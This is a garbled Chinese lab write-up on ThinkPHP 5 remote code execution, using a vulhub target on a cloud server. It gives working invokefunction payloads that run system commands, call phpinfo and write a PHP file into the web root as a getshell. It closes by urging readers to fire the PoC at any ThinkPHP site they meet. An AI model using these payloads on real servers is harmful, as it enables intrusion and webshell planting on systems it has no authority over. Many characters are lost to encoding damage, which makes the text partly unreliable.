ThinkPHP是為了簡化企業級應?開發和敏捷WEB應?開發?誕?的,是?個快速、兼容?且簡單的輕量級國產PHP開發框架,誕?于2006年初,原名FCS,2007年元旦正式更名為
ThinkPHP,遵循Apache2開源協議發布,從Struts結構移植過來并做了改進和完善,同時也借鑒了國外很多優秀的框架和模式,使??向對象的開發結構和MVC模式,融合了Struts的思想和TagLib(標簽庫)、RoR的ORM映射和ActiveRecord模式。
ThinkPHP可以?持windows/Unix/Linux等服務器環境,正式版需要PHP5.0以上版本?持,?持MySql、PgSQL、Sqlite多種數據庫以及PDO擴展,是?款跨平臺,跨版本以及簡單易?的PHP框架。 TP(2-6) (5-?前使?率較?的)
Thinkphp5x遠程命令執?及getshell
thinkphp5最出名的就是rce
環境配置
云服務器:8.138.19.182:8080
靶場:vulhub/thinkphp/5-rce
docker-compose up -d #啟動環境
訪問靶場:http://8.138.19.182:8080/
漏洞利?
漏洞根本源于 thinkphp/library/think/Request.php 中method?法可以進?變量覆蓋,通
過覆蓋類的核?屬性filter導致rce,其攻擊點較為多,有些還具有限制條件,另外由于種種部分
原因,在利?上會出現?些問題。
遠程命令執?
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
遠程代碼執?
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
getshell
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php根?錄?成1.php ?件,輸出phpinfo
Thinkphp被曝很多漏洞,截??前位置3x -- 6x的各個版本都被爆有?量漏洞,遇到TP的站,直接打poc就可以了;
)
)
)
